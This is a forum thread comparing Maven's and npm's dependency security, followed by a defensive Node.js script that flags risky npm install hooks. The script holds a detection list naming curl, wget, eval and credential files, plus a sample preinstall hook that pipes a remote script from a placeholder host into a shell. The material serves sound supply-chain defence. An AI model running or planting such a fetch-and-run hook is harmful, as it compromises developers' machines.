JD557, 4 hours ago

I have a similar opinion but I think Java's model with maven and friends hits the sweet spot:

- Packages are always namespaced, so typosquatting is harder
- Registries like Sonatype require you to validate your domain
- Versions are usually locked by default

My professional life has been tied to JVM languages, though, so I might be a bit biased. I get that there are some issues with the model, especially when it comes to eviction, but it has been "good enough" for me. Curious what other people think about it.
oftenwrong, 3 hours ago (reply to parent)

Maven does not support "scripts" as NPM does, such as the pre-install script used for this exploit. With scripts enabled, the mere act of downloading a dependency requires a high degree of trust in it.
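As an added example (not part of the thread and not code from any project the commenters mention): a small Node script that reads a package manifest and reports which lifecycle scripts `npm install` would run automatically, with a rough triage of each command and an allowlist for packages that legitimately need an install step. The manifests and the package names in it are constructed for illustration; the hook names are npm's own script names.

```javascript
// Inspect an npm manifest for lifecycle scripts that run unprompted during
// install, before deciding whether to trust the dependency.
// All manifests below are CONSTRUCTED samples, not real packages.

// Lifecycle hooks npm runs automatically when installing a dependency
// (preinstall/install/postinstall) or preparing the package itself
// (the prepare family).
const INSTALL_HOOKS = [
  "preinstall", "install", "postinstall",
  "prepublish", "preprepare", "prepare", "postprepare",
];

// Return the lifecycle scripts a manifest declares, as [{ name, command }],
// in INSTALL_HOOKS order.
function findLifecycleScripts(manifest) {
  const scripts = (manifest && manifest.scripts) || {};
  return INSTALL_HOOKS
    .filter((name) => Object.prototype.hasOwnProperty.call(scripts, name))
    .map((name) => ({ name, command: String(scripts[name]) }));
}

// Patterns a reviewer would want to read by hand: network fetches, shell
// downloaders, encoded blobs, eval, touching the home dir or credentials.
// Heuristic only; an empty result is not evidence that a script is safe.
const SUSPICIOUS = [
  /\bcurl\b/, /\bwget\b/, /\bbase64\b/, /\beval\b/, /\bchild_process\b/,
  /https?:\/\//, /\$HOME|~\//, /\.ssh\b/, /\.npmrc\b/,
];

// Return the source text of every SUSPICIOUS pattern the command matches.
function triageCommand(command) {
  return SUSPICIOUS.filter((re) => re.test(command)).map((re) => re.source);
}

// Policy decision for one dependency:
//   no lifecycle scripts                   -> "ok"
//   scripts present, package allowlisted   -> "allowlisted" (e.g. native addons)
//   scripts present otherwise              -> "review", with triage hits attached
function assessManifest(manifest, allowlist = new Set()) {
  const hooks = findLifecycleScripts(manifest);
  if (hooks.length === 0) return { verdict: "ok", hooks };
  if (allowlist.has(manifest.name)) return { verdict: "allowlisted", hooks };
  const findings = hooks.map((h) => ({ ...h, hits: triageCommand(h.command) }));
  return { verdict: "review", hooks: findings };
}

// Constructed sample manifests (hypothetical package names).
const BENIGN = {
  name: "left-padding-util", version: "1.0.0",
  scripts: { test: "node test.js" },
};
const NATIVE = {
  name: "some-native-addon", version: "2.1.0",
  scripts: { install: "node-gyp rebuild" },
};
const SHADY = {
  name: "colour-helpers", version: "0.0.3",
  scripts: { preinstall: "curl -fsSL https://example.invalid/setup.sh | sh" },
};

// Stand-alone report over the three samples.
function printReport(allowlist = new Set(["some-native-addon"])) {
  for (const m of [BENIGN, NATIVE, SHADY]) {
    console.log(m.name, JSON.stringify(assessManifest(m, allowlist)));
  }
}
printReport();
```

The blunt mitigation the comment implies is `npm install --ignore-scripts` (or `ignore-scripts=true` in `.npmrc`), which stops every lifecycle hook from running; the catch is that packages with a genuine build step, such as native addons driven by `node-gyp`, then stop working, which is why the check above carries an allowlist instead of a blanket refusal.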